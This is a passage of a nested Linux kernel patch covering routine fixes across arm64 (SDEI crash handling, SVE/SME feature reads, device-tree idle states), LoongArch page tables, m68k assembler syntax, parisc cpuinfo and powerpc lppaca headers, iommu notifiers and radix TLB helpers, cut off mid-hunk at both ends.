+ 				local-timer-stop;
+ 			};
+@@ -246,8 +246,8 @@
+ 				compatible = "arm,idle-state";
+ 				idle-state-name = "gold-rail-power-collapse";
+ 				arm,psci-suspend-param = <0x40000004>;
+-				entry-latency-us = <241>;
+-				exit-latency-us = <1461>;
++				entry-latency-us = <702>;
++				exit-latency-us = <1061>;
+ 				min-residency-us = <4488>;
+ 				local-timer-stop;
+ 			};
+@@ -2072,6 +2072,13 @@
+ 			      <0 0x18593000 0 0x1000>;
+ 			reg-names = "freq-domain0", "freq-domain1", "freq-domain2";
+ 
++			interrupts = <GIC_SPI 30 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 31 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "dcvsh-irq-0",
++					  "dcvsh-irq-1",
++					  "dcvsh-irq-2";
++
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>, <&gcc GCC_GPLL0>;
+ 			clock-names = "xo", "alternate";
+ 
+diff --git a/arch/arm64/include/asm/sdei.h b/arch/arm64/include/asm/sdei.h
+index 4292d9bafb9d2..484cb6972e99a 100644
+--- a/arch/arm64/include/asm/sdei.h
++++ b/arch/arm64/include/asm/sdei.h
+@@ -17,6 +17,9 @@
+ 
+ #include <asm/virt.h>
+ 
++DECLARE_PER_CPU(struct sdei_registered_event *, sdei_active_normal_event);
++DECLARE_PER_CPU(struct sdei_registered_event *, sdei_active_critical_event);
++
+ extern unsigned long sdei_exit_mode;
+ 
+ /* Software Delegated Exception entry point from firmware*/
+@@ -29,6 +32,9 @@ asmlinkage void __sdei_asm_entry_trampoline(unsigned long event_num,
+ 						   unsigned long pc,
+ 						   unsigned long pstate);
+ 
++/* Abort a running handler. Context is discarded. */
++void __sdei_handler_abort(void);
++
+ /*
+  * The above entry point does the minimum to call C code. This function does
+  * anything else, before calling the driver.
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index 3671d9521d4f5..beb4db21c89c1 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -993,9 +993,13 @@ SYM_CODE_START(__sdei_asm_handler)
+ 
+ 	mov	x19, x1
+ 
+-#if defined(CONFIG_VMAP_STACK) || defined(CONFIG_SHADOW_CALL_STACK)
++	/* Store the registered-event for crash_smp_send_stop() */
+ 	ldrb	w4, [x19, #SDEI_EVENT_PRIORITY]
+-#endif
++	cbnz	w4, 1f
++	adr_this_cpu dst=x5, sym=sdei_active_normal_event, tmp=x6
++	b	2f
++1:	adr_this_cpu dst=x5, sym=sdei_active_critical_event, tmp=x6
++2:	str	x19, [x5]
+ 
+ #ifdef CONFIG_VMAP_STACK
+ 	/*
+@@ -1062,6 +1066,14 @@ SYM_CODE_START(__sdei_asm_handler)
+ 
+ 	ldr_l	x2, sdei_exit_mode
+ 
++	/* Clear the registered-event seen by crash_smp_send_stop() */
++	ldrb	w3, [x4, #SDEI_EVENT_PRIORITY]
++	cbnz	w3, 1f
++	adr_this_cpu dst=x5, sym=sdei_active_normal_event, tmp=x6
++	b	2f
++1:	adr_this_cpu dst=x5, sym=sdei_active_critical_event, tmp=x6
++2:	str	xzr, [x5]
++
+ alternative_if_not ARM64_UNMAP_KERNEL_AT_EL0
+ 	sdei_handler_exit exit_mode=x2
+ alternative_else_nop_endif
+@@ -1072,4 +1084,15 @@ alternative_else_nop_endif
+ #endif
+ SYM_CODE_END(__sdei_asm_handler)
+ NOKPROBE(__sdei_asm_handler)
++
++SYM_CODE_START(__sdei_handler_abort)
++	mov_q	x0, SDEI_1_0_FN_SDEI_EVENT_COMPLETE_AND_RESUME
++	adr	x1, 1f
++	ldr_l	x2, sdei_exit_mode
++	sdei_handler_exit exit_mode=x2
++	// exit the handler and jump to the next instruction.
++	// Exit will stomp x0-x17, PSTATE, ELR_ELx, and SPSR_ELx.
++1:	ret
++SYM_CODE_END(__sdei_handler_abort)
++NOKPROBE(__sdei_handler_abort)
+ #endif /* CONFIG_ARM_SDE_INTERFACE */
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 8cd59d387b90b..8c226d79abdfc 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -1133,9 +1133,6 @@ void sve_kernel_enable(const struct arm64_cpu_capabilities *__always_unused p)
+  */
+ u64 read_zcr_features(void)
+ {
+-	u64 zcr;
+-	unsigned int vq_max;
+-
+ 	/*
+ 	 * Set the maximum possible VL, and write zeroes to all other
+ 	 * bits to see if they stick.
+@@ -1143,12 +1140,8 @@ u64 read_zcr_features(void)
+ 	sve_kernel_enable(NULL);
+ 	write_sysreg_s(ZCR_ELx_LEN_MASK, SYS_ZCR_EL1);
+ 
+-	zcr = read_sysreg_s(SYS_ZCR_EL1);
+-	zcr &= ~(u64)ZCR_ELx_LEN_MASK; /* find sticky 1s outside LEN field */
+-	vq_max = sve_vq_from_vl(sve_get_vl());
+-	zcr |= vq_max - 1; /* set LEN field to maximum effective value */
+-
+-	return zcr;
++	/* Return LEN value that would be written to get the maximum VL */
++	return sve_vq_from_vl(sve_get_vl()) - 1;
+ }
+ 
+ void __init sve_setup(void)
+@@ -1292,11 +1285,7 @@ void fa64_kernel_enable(const struct arm64_cpu_capabilities *__always_unused p)
+  */
+ u64 read_smcr_features(void)
+ {
+-	u64 smcr;
+-	unsigned int vq_max;
+-
+ 	sme_kernel_enable(NULL);
+-	sme_smstart_sm();
+ 
+ 	/*
+ 	 * Set the maximum possible VL.
+@@ -1304,14 +1293,8 @@ u64 read_smcr_features(void)
+ 	write_sysreg_s(read_sysreg_s(SYS_SMCR_EL1) | SMCR_ELx_LEN_MASK,
+ 		       SYS_SMCR_EL1);
+ 
+-	smcr = read_sysreg_s(SYS_SMCR_EL1);
+-	smcr &= ~(u64)SMCR_ELx_LEN_MASK; /* Only the LEN field */
+-	vq_max = sve_vq_from_vl(sve_get_vl());
+-	smcr |= vq_max - 1; /* set LEN field to maximum effective value */
+-
+-	sme_smstop_sm();
+-
+-	return smcr;
++	/* Return LEN value that would be written to get the maximum VL */
++	return sve_vq_from_vl(sme_get_vl()) - 1;
+ }
+ 
+ void __init sme_setup(void)
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index f606c942f514e..e1f6366b7ccdf 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -896,7 +896,8 @@ static int sve_set_common(struct task_struct *target,
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+-			return -EINVAL;
++			ret = -EINVAL;
++			goto out;
+ 		}
+ 
+ 		/*
+diff --git a/arch/arm64/kernel/sdei.c b/arch/arm64/kernel/sdei.c
+index d56e170e1ca7c..48c6457b67db8 100644
+--- a/arch/arm64/kernel/sdei.c
++++ b/arch/arm64/kernel/sdei.c
+@@ -47,6 +47,9 @@ DEFINE_PER_CPU(unsigned long *, sdei_shadow_call_stack_normal_ptr);
+ DEFINE_PER_CPU(unsigned long *, sdei_shadow_call_stack_critical_ptr);
+ #endif
+ 
++DEFINE_PER_CPU(struct sdei_registered_event *, sdei_active_normal_event);
++DEFINE_PER_CPU(struct sdei_registered_event *, sdei_active_critical_event);
++
+ static void _free_sdei_stack(unsigned long * __percpu *ptr, int cpu)
+ {
+ 	unsigned long *p;
+diff --git a/arch/arm64/kernel/smp.c b/arch/arm64/kernel/smp.c
+index ffc5d76cf6955..d323621d14a59 100644
+--- a/arch/arm64/kernel/smp.c
++++ b/arch/arm64/kernel/smp.c
+@@ -1047,10 +1047,8 @@ void crash_smp_send_stop(void)
+ 	 * If this cpu is the only one alive at this point in time, online or
+ 	 * not, there are no stop messages to be sent around, so just back out.
+ 	 */
+-	if (num_other_online_cpus() == 0) {
+-		sdei_mask_local_cpu();
+-		return;
+-	}
++	if (num_other_online_cpus() == 0)
++		goto skip_ipi;
+ 
+ 	cpumask_copy(&mask, cpu_online_mask);
+ 	cpumask_clear_cpu(smp_processor_id(), &mask);
+@@ -1069,7 +1067,9 @@ void crash_smp_send_stop(void)
+ 		pr_warn("SMP: failed to stop secondary CPUs %*pbl\n",
+ 			cpumask_pr_args(&mask));
+ 
++skip_ipi:
+ 	sdei_mask_local_cpu();
++	sdei_handler_abort();
+ }
+ 
+ bool smp_crash_stop_failed(void)
+diff --git a/arch/arm64/lib/csum.c b/arch/arm64/lib/csum.c
+index 78b87a64ca0a3..2432683e48a61 100644
+--- a/arch/arm64/lib/csum.c
++++ b/arch/arm64/lib/csum.c
+@@ -24,7 +24,7 @@ unsigned int __no_sanitize_address do_csum(const unsigned char *buff, int len)
+ 	const u64 *ptr;
+ 	u64 data, sum64 = 0;
+ 
+-	if (unlikely(len == 0))
++	if (unlikely(len <= 0))
+ 		return 0;
+ 
+ 	offset = (unsigned long)buff & 7;
+diff --git a/arch/arm64/mm/hugetlbpage.c b/arch/arm64/mm/hugetlbpage.c
+index 35e9a468d13e6..134dcf6bc650c 100644
+--- a/arch/arm64/mm/hugetlbpage.c
++++ b/arch/arm64/mm/hugetlbpage.c
+@@ -236,7 +236,7 @@ static void clear_flush(struct mm_struct *mm,
+ 	unsigned long i, saddr = addr;
+ 
+ 	for (i = 0; i < ncontig; i++, addr += pgsize, ptep++)
+-		pte_clear(mm, addr, ptep);
++		ptep_clear(mm, addr, ptep);
+ 
+ 	flush_tlb_range(&vma, saddr, addr);
+ }
+diff --git a/arch/loongarch/include/asm/loongarch.h b/arch/loongarch/include/asm/loongarch.h
+index 62835d84a647d..3d15fa5bef37d 100644
+--- a/arch/loongarch/include/asm/loongarch.h
++++ b/arch/loongarch/include/asm/loongarch.h
+@@ -1488,7 +1488,7 @@ __BUILD_CSR_OP(tlbidx)
+ #define write_fcsr(dest, val) \
+ do {	\
+ 	__asm__ __volatile__(	\
+-	"	movgr2fcsr	%0, "__stringify(dest)"	\n"	\
++	"	movgr2fcsr	"__stringify(dest)", %0	\n"	\
+ 	: : "r" (val));	\
+ } while (0)
+ 
+diff --git a/arch/loongarch/include/asm/pgtable-bits.h b/arch/loongarch/include/asm/pgtable-bits.h
+index 3d1e0a69975a5..5f2ebcea509cd 100644
+--- a/arch/loongarch/include/asm/pgtable-bits.h
++++ b/arch/loongarch/include/asm/pgtable-bits.h
+@@ -21,12 +21,14 @@
+ #define	_PAGE_HGLOBAL_SHIFT	12 /* HGlobal is a PMD bit */
+ #define	_PAGE_PFN_SHIFT		12
+ #define	_PAGE_PFN_END_SHIFT	48
++#define	_PAGE_PRESENT_INVALID_SHIFT 60
+ #define	_PAGE_NO_READ_SHIFT	61
+ #define	_PAGE_NO_EXEC_SHIFT	62
+ #define	_PAGE_RPLV_SHIFT	63
+ 
+ /* Used by software */
+ #define _PAGE_PRESENT		(_ULCAST_(1) << _PAGE_PRESENT_SHIFT)
++#define _PAGE_PRESENT_INVALID	(_ULCAST_(1) << _PAGE_PRESENT_INVALID_SHIFT)
+ #define _PAGE_WRITE		(_ULCAST_(1) << _PAGE_WRITE_SHIFT)
+ #define _PAGE_ACCESSED		(_ULCAST_(1) << _PAGE_ACCESSED_SHIFT)
+ #define _PAGE_MODIFIED		(_ULCAST_(1) << _PAGE_MODIFIED_SHIFT)
+diff --git a/arch/loongarch/include/asm/pgtable.h b/arch/loongarch/include/asm/pgtable.h
+index 79d5bfd913e0f..f991e678ca4b7 100644
+--- a/arch/loongarch/include/asm/pgtable.h
++++ b/arch/loongarch/include/asm/pgtable.h
+@@ -208,7 +208,7 @@ static inline int pmd_bad(pmd_t pmd)
+ static inline int pmd_present(pmd_t pmd)
+ {
+ 	if (unlikely(pmd_val(pmd) & _PAGE_HUGE))
+-		return !!(pmd_val(pmd) & (_PAGE_PRESENT | _PAGE_PROTNONE));
++		return !!(pmd_val(pmd) & (_PAGE_PRESENT | _PAGE_PROTNONE | _PAGE_PRESENT_INVALID));
+ 
+ 	return pmd_val(pmd) != (unsigned long)invalid_pte_table;
+ }
+@@ -525,6 +525,7 @@ static inline pmd_t pmd_modify(pmd_t pmd, pgprot_t newprot)
+ 
+ static inline pmd_t pmd_mkinvalid(pmd_t pmd)
+ {
++	pmd_val(pmd) |= _PAGE_PRESENT_INVALID;
+ 	pmd_val(pmd) &= ~(_PAGE_PRESENT | _PAGE_VALID | _PAGE_DIRTY | _PAGE_PROTNONE);
+ 
+ 	return pmd;
+@@ -559,6 +560,9 @@ static inline long pmd_protnone(pmd_t pmd)
+ }
+ #endif /* CONFIG_NUMA_BALANCING */
+ 
++#define pmd_leaf(pmd)		((pmd_val(pmd) & _PAGE_HUGE) != 0)
++#define pud_leaf(pud)		((pud_val(pud) & _PAGE_HUGE) != 0)
++
+ /*
+  * We provide our own get_unmapped area to cope with the virtual aliasing
+  * constraints placed on us by the cache architecture.
+diff --git a/arch/m68k/fpsp040/skeleton.S b/arch/m68k/fpsp040/skeleton.S
+index 439395aa6fb42..081922c72daaa 100644
+--- a/arch/m68k/fpsp040/skeleton.S
++++ b/arch/m68k/fpsp040/skeleton.S
+@@ -499,13 +499,13 @@ in_ea:
+ 	dbf	%d0,morein
+ 	rts
+ 
+-	.section .fixup,#alloc,#execinstr
++	.section .fixup,"ax"
+ 	.even
+ 1:
+ 	jbsr	fpsp040_die
+ 	jbra	.Lnotkern
+ 
+-	.section __ex_table,#alloc
++	.section __ex_table,"a"
+ 	.align	4
+ 
+ 	.long	in_ea,1b
+diff --git a/arch/m68k/ifpsp060/os.S b/arch/m68k/ifpsp060/os.S
+index 7a0d6e4280665..89e2ec224ab6c 100644
+--- a/arch/m68k/ifpsp060/os.S
++++ b/arch/m68k/ifpsp060/os.S
+@@ -379,11 +379,11 @@ _060_real_access:
+ 
+ 
+ | Execption handling for movs access to illegal memory
+-	.section .fixup,#alloc,#execinstr
++	.section .fixup,"ax"
+ 	.even
+ 1:	moveq		#-1,%d1
+ 	rts
+-.section __ex_table,#alloc
++.section __ex_table,"a"
+ 	.align 4
+ 	.long	dmrbuae,1b
+ 	.long	dmrwuae,1b
+diff --git a/arch/m68k/kernel/relocate_kernel.S b/arch/m68k/kernel/relocate_kernel.S
+index ab0f1e7d46535..f7667079e08e9 100644
+--- a/arch/m68k/kernel/relocate_kernel.S
++++ b/arch/m68k/kernel/relocate_kernel.S
+@@ -26,7 +26,7 @@ ENTRY(relocate_new_kernel)
+ 	lea %pc@(.Lcopy),%a4
+ 2:	addl #0x00000000,%a4		/* virt_to_phys() */
+ 
+-	.section ".m68k_fixup","aw"
++	.section .m68k_fixup,"aw"
+ 	.long M68K_FIXUP_MEMOFFSET, 2b+2
+ 	.previous
+ 
+@@ -49,7 +49,7 @@ ENTRY(relocate_new_kernel)
+ 	lea %pc@(.Lcont040),%a4
+ 5:	addl #0x00000000,%a4		/* virt_to_phys() */
+ 
+-	.section ".m68k_fixup","aw"
++	.section .m68k_fixup,"aw"
+ 	.long M68K_FIXUP_MEMOFFSET, 5b+2
+ 	.previous
+ 
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index cf1fbf4eaa8a0..0e62f5edaee2e 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -83,7 +83,6 @@ config MIPS
+ 	select HAVE_LD_DEAD_CODE_DATA_ELIMINATION
+ 	select HAVE_MOD_ARCH_SPECIFIC
+ 	select HAVE_NMI
+-	select HAVE_PATA_PLATFORM
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_PERF_REGS
+ 	select HAVE_PERF_USER_STACK_DUMP
+diff --git a/arch/parisc/kernel/processor.c b/arch/parisc/kernel/processor.c
+index dddaaa6e7a825..1f6c776d80813 100644
+--- a/arch/parisc/kernel/processor.c
++++ b/arch/parisc/kernel/processor.c
+@@ -372,10 +372,18 @@ int
+ show_cpuinfo (struct seq_file *m, void *v)
+ {
+ 	unsigned long cpu;
++	char cpu_name[60], *p;
++
++	/* strip PA path from CPU name to not confuse lscpu */
++	strlcpy(cpu_name, per_cpu(cpu_data, 0).dev->name, sizeof(cpu_name));
++	p = strrchr(cpu_name, '[');
++	if (p)
++		*(--p) = 0;
+ 
+ 	for_each_online_cpu(cpu) {
+-		const struct cpuinfo_parisc *cpuinfo = &per_cpu(cpu_data, cpu);
+ #ifdef CONFIG_SMP
++		const struct cpuinfo_parisc *cpuinfo = &per_cpu(cpu_data, cpu);
++
+ 		if (0 == cpuinfo->hpa)
+ 			continue;
+ #endif
+@@ -420,8 +428,7 @@ show_cpuinfo (struct seq_file *m, void *v)
+ 
+ 		seq_printf(m, "model\t\t: %s - %s\n",
+ 				 boot_cpu_data.pdc.sys_model_name,
+-				 cpuinfo->dev ?
+-				 cpuinfo->dev->name : "Unknown");
++				 cpu_name);
+ 
+ 		seq_printf(m, "hversion\t: 0x%08x\n"
+ 			        "sversion\t: 0x%08x\n",
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index 13fad4f0a6d8f..b13324b1a1696 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -34,8 +34,6 @@ endif
+ 
+ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 -fno-strict-aliasing -O2 -msoft-float -mno-altivec -mno-vsx \
+-		 $(call cc-option,-mno-prefixed) $(call cc-option,-mno-pcrel) \
+-		 $(call cc-option,-mno-mma) \
+ 		 $(call cc-option,-mno-spe) $(call cc-option,-mspe=no) \
+ 		 -pipe -fomit-frame-pointer -fno-builtin -fPIC -nostdinc \
+ 		 $(LINUXINCLUDE)
+@@ -71,6 +69,10 @@ BOOTAFLAGS	:= -D__ASSEMBLY__ $(BOOTCFLAGS) -nostdinc
+ 
+ BOOTARFLAGS	:= -crD
+ 
++BOOTCFLAGS	+= $(call cc-option,-mno-prefixed) \
++		   $(call cc-option,-mno-pcrel) \
++		   $(call cc-option,-mno-mma)
++
+ ifdef CONFIG_CC_IS_CLANG
+ BOOTCFLAGS += $(CLANG_FLAGS)
+ BOOTAFLAGS += $(CLANG_FLAGS)
+diff --git a/arch/powerpc/include/asm/lppaca.h b/arch/powerpc/include/asm/lppaca.h
+index 34d44cb17c874..ee1488d38fdc1 100644
+--- a/arch/powerpc/include/asm/lppaca.h
++++ b/arch/powerpc/include/asm/lppaca.h
+@@ -45,6 +45,7 @@
+ #include <asm/types.h>
+ #include <asm/mmu.h>
+ #include <asm/firmware.h>
++#include <asm/paca.h>
+ 
+ /*
+  * The lppaca is the "virtual processor area" registered with the hypervisor,
+@@ -127,13 +128,23 @@ struct lppaca {
+  */
+ #define LPPACA_OLD_SHARED_PROC		2
+ 
+-static inline bool lppaca_shared_proc(struct lppaca *l)
++#ifdef CONFIG_PPC_PSERIES
++/*
++ * All CPUs should have the same shared proc value, so directly access the PACA
++ * to avoid false positives from DEBUG_PREEMPT.
++ */
++static inline bool lppaca_shared_proc(void)
+ {
++	struct lppaca *l = local_paca->lppaca_ptr;
++
+ 	if (!firmware_has_feature(FW_FEATURE_SPLPAR))
+ 		return false;
+ 	return !!(l->__old_status & LPPACA_OLD_SHARED_PROC);
+ }
+ 
++#define get_lppaca()	(get_paca()->lppaca_ptr)
++#endif
++
+ /*
+  * SLB shadow buffer structure as defined in the PAPR.  The save_area
+  * contains adjacent ESID and VSID pairs for each shadowed SLB.  The
+diff --git a/arch/powerpc/include/asm/paca.h b/arch/powerpc/include/asm/paca.h
+index 0ab3511a47d77..183b5a251804c 100644
+--- a/arch/powerpc/include/asm/paca.h
++++ b/arch/powerpc/include/asm/paca.h
+@@ -15,7 +15,6 @@
+ #include <linux/cache.h>
+ #include <linux/string.h>
+ #include <asm/types.h>
+-#include <asm/lppaca.h>
+ #include <asm/mmu.h>
+ #include <asm/page.h>
+ #ifdef CONFIG_PPC_BOOK3E_64
+@@ -47,14 +46,11 @@ extern unsigned int debug_smp_processor_id(void); /* from linux/smp.h */
+ #define get_paca()	local_paca
+ #endif
+ 
+-#ifdef CONFIG_PPC_PSERIES
+-#define get_lppaca()	(get_paca()->lppaca_ptr)
+-#endif
+-
+ #define get_slb_shadow()	(get_paca()->slb_shadow_ptr)
+ 
+ struct task_struct;
+ struct rtas_args;
++struct lppaca;
+ 
+ /*
+  * Defines the layout of the paca.
+diff --git a/arch/powerpc/include/asm/paravirt.h b/arch/powerpc/include/asm/paravirt.h
+index f5ba1a3c41f8e..e08513d731193 100644
+--- a/arch/powerpc/include/asm/paravirt.h
++++ b/arch/powerpc/include/asm/paravirt.h
+@@ -6,6 +6,7 @@
+ #include <asm/smp.h>
+ #ifdef CONFIG_PPC64
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #include <asm/hvcall.h>
+ #endif
+ 
+diff --git a/arch/powerpc/include/asm/plpar_wrappers.h b/arch/powerpc/include/asm/plpar_wrappers.h
+index 8239c0af5eb2b..fe3d0ea0058ac 100644
+--- a/arch/powerpc/include/asm/plpar_wrappers.h
++++ b/arch/powerpc/include/asm/plpar_wrappers.h
+@@ -9,6 +9,7 @@
+ 
+ #include <asm/hvcall.h>
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #include <asm/page.h>
+ 
+ static inline long poll_pending(void)
+diff --git a/arch/powerpc/kernel/fadump.c b/arch/powerpc/kernel/fadump.c
+index ea0a073abd969..3ff2da7b120b5 100644
+--- a/arch/powerpc/kernel/fadump.c
++++ b/arch/powerpc/kernel/fadump.c
+@@ -654,6 +654,7 @@ int __init fadump_reserve_mem(void)
+ 	return ret;
+ error_out:
+ 	fw_dump.fadump_enabled = 0;
++	fw_dump.reserve_dump_area_size = 0;
+ 	return 0;
+ }
+ 
+diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
+index b8b7a189cd3ce..a612abe4bfd57 100644
+--- a/arch/powerpc/kernel/iommu.c
++++ b/arch/powerpc/kernel/iommu.c
+@@ -171,17 +171,28 @@ static int fail_iommu_bus_notify(struct notifier_block *nb,
+ 	return 0;
+ }
+ 
+-static struct notifier_block fail_iommu_bus_notifier = {
++/*
++ * PCI and VIO buses need separate notifier_block structs, since they're linked
++ * list nodes.  Sharing a notifier_block would mean that any notifiers later
++ * registered for PCI buses would also get called by VIO buses and vice versa.
++ */
++static struct notifier_block fail_iommu_pci_bus_notifier = {
+ 	.notifier_call = fail_iommu_bus_notify
+ };
+ 
++#ifdef CONFIG_IBMVIO
++static struct notifier_block fail_iommu_vio_bus_notifier = {
++	.notifier_call = fail_iommu_bus_notify
++};
++#endif
++
+ static int __init fail_iommu_setup(void)
+ {
+ #ifdef CONFIG_PCI
+-	bus_register_notifier(&pci_bus_type, &fail_iommu_bus_notifier);
++	bus_register_notifier(&pci_bus_type, &fail_iommu_pci_bus_notifier);
+ #endif
+ #ifdef CONFIG_IBMVIO
+-	bus_register_notifier(&vio_bus_type, &fail_iommu_bus_notifier);
++	bus_register_notifier(&vio_bus_type, &fail_iommu_vio_bus_notifier);
+ #endif
+ 
+ 	return 0;
+diff --git a/arch/powerpc/kvm/book3s_hv_ras.c b/arch/powerpc/kvm/book3s_hv_ras.c
+index ccfd969656306..82be6d87514b7 100644
+--- a/arch/powerpc/kvm/book3s_hv_ras.c
++++ b/arch/powerpc/kvm/book3s_hv_ras.c
+@@ -9,6 +9,7 @@
+ #include <linux/kvm.h>
+ #include <linux/kvm_host.h>
+ #include <linux/kernel.h>
++#include <asm/lppaca.h>
+ #include <asm/opal.h>
+ #include <asm/mce.h>
+ #include <asm/machdep.h>
+diff --git a/arch/powerpc/mm/book3s64/radix_tlb.c b/arch/powerpc/mm/book3s64/radix_tlb.c
+index 6d7a1ef723e69..a8ba04dcb20fa 100644
+--- a/arch/powerpc/mm/book3s64/radix_tlb.c
++++ b/arch/powerpc/mm/book3s64/radix_tlb.c
+@@ -127,21 +127,6 @@ static __always_inline void __tlbie_pid(unsigned long pid, unsigned long ric)
+ 	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+ }
+ 
+-static __always_inline void __tlbie_pid_lpid(unsigned long pid,
+-					     unsigned long lpid,
+-					     unsigned long ric)
+-{
+-	unsigned long rb, rs, prs, r;
+-
+-	rb = PPC_BIT(53); /* IS = 1 */
+-	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
+-	prs = 1; /* process scoped */
+-	r = 1;   /* radix format */
+-
+-	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
+-		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
+-	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+-}
+ static __always_inline void __tlbie_lpid(unsigned long lpid, unsigned long ric)
+ {
+ 	unsigned long rb,rs,prs,r;
+@@ -202,23 +187,6 @@ static __always_inline void __tlbie_va(unsigned long va, unsigned long pid,
+ 	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+ }
+ 
+-static __always_inline void __tlbie_va_lpid(unsigned long va, unsigned long pid,
+-					    unsigned long lpid,
+-					    unsigned long ap, unsigned long ric)
+-{
+-	unsigned long rb, rs, prs, r;
+-
+-	rb = va & ~(PPC_BITMASK(52, 63));
+-	rb |= ap << PPC_BITLSHIFT(58);
+-	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
+-	prs = 1; /* process scoped */
+-	r = 1;   /* radix format */
+-
+-	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
+-		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
+-	trace_tlbie(0, 0, rb, rs, ric, prs, r);
+-}
+-
+ static __always_inline void __tlbie_lpid_va(unsigned long va, unsigned long lpid,
+ 					    unsigned long ap, unsigned long ric)
+ {
+@@ -264,22 +232,6 @@ static inline void fixup_tlbie_va_range(unsigned long va, unsigned long pid,
+ 	}
+ }
+ 
+-static inline void fixup_tlbie_va_range_lpid(unsigned long va,
+-					     unsigned long pid,
+-					     unsigned long lpid,
+-					     unsigned long ap)
+-{
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
+-	}
+-
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_va_lpid(va, pid, lpid, ap, RIC_FLUSH_TLB);
+-	}
+-}
+-
+ static inline void fixup_tlbie_pid(unsigned long pid)
+ {
+ 	/*
+@@ -299,26 +251,6 @@ static inline void fixup_tlbie_pid(unsigned long pid)
+ 	}
+ }
+ 
+-static inline void fixup_tlbie_pid_lpid(unsigned long pid, unsigned long lpid)
+-{
+-	/*
+-	 * We can use any address for the invalidation, pick one which is
+-	 * probably unused as an optimisation.
+-	 */
+-	unsigned long va = ((1UL << 52) - 1);
+-
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
+-	}
+-
+-	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
+-		asm volatile("ptesync" : : : "memory");
+-		__tlbie_va_lpid(va, pid, lpid, mmu_get_ap(MMU_PAGE_64K),
+-				RIC_FLUSH_TLB);
+-	}
+-}
+-
+ static inline void fixup_tlbie_lpid_va(unsigned long va, unsigned long lpid,
+ 				       unsigned long ap)
+ {
+@@ -416,31 +348,6 @@ static inline void _tlbie_pid(unsigned long pid, unsigned long ric)
+ 	asm volatile("eieio; tlbsync; ptesync": : :"memory");
+ }
+ 
+-static inline void _tlbie_pid_lpid(unsigned long pid, unsigned long lpid,
+-				   unsigned long ric)
+-{
+-	asm volatile("ptesync" : : : "memory");
+-
+-	/*
+-	 * Workaround the fact that the "ric" argument to __tlbie_pid
+-	 * must be a compile-time contraint to match the "i" constraint
+-	 * in the asm statement.
+-	 */
+-	switch (ric) {
+-	case RIC_FLUSH_TLB:
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_TLB);
+-		fixup_tlbie_pid_lpid(pid, lpid);
+-		break;
+-	case RIC_FLUSH_PWC:
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
+-		break;
+-	case RIC_FLUSH_ALL:
+-	default:
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_ALL);
+-		fixup_tlbie_pid_lpid(pid, lpid);
+-	}
+-	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
+-}
+ struct tlbiel_pid {
+ 	unsigned long pid;
+ 	unsigned long ric;
+@@ -566,20 +473,6 @@ static inline void __tlbie_va_range(unsigned long start, unsigned long end,
+ 	fixup_tlbie_va_range(addr - page_size, pid, ap);
+ }
+ 
+-static inline void __tlbie_va_range_lpid(unsigned long start, unsigned long end,
+-					 unsigned long pid, unsigned long lpid,
+-					 unsigned long page_size,
+-					 unsigned long psize)
+-{
+-	unsigned long addr;
+-	unsigned long ap = mmu_get_ap(psize);
+-
+-	for (addr = start; addr < end; addr += page_size)
+-		__tlbie_va_lpid(addr, pid, lpid, ap, RIC_FLUSH_TLB);
+-
+-	fixup_tlbie_va_range_lpid(addr - page_size, pid, lpid, ap);
+-}
+-
+ static __always_inline void _tlbie_va(unsigned long va, unsigned long pid,
+ 				      unsigned long psize, unsigned long ric)
+ {
+@@ -660,18 +553,6 @@ static inline void _tlbie_va_range(unsigned long start, unsigned long end,
+ 	asm volatile("eieio; tlbsync; ptesync": : :"memory");
+ }
+ 
+-static inline void _tlbie_va_range_lpid(unsigned long start, unsigned long end,
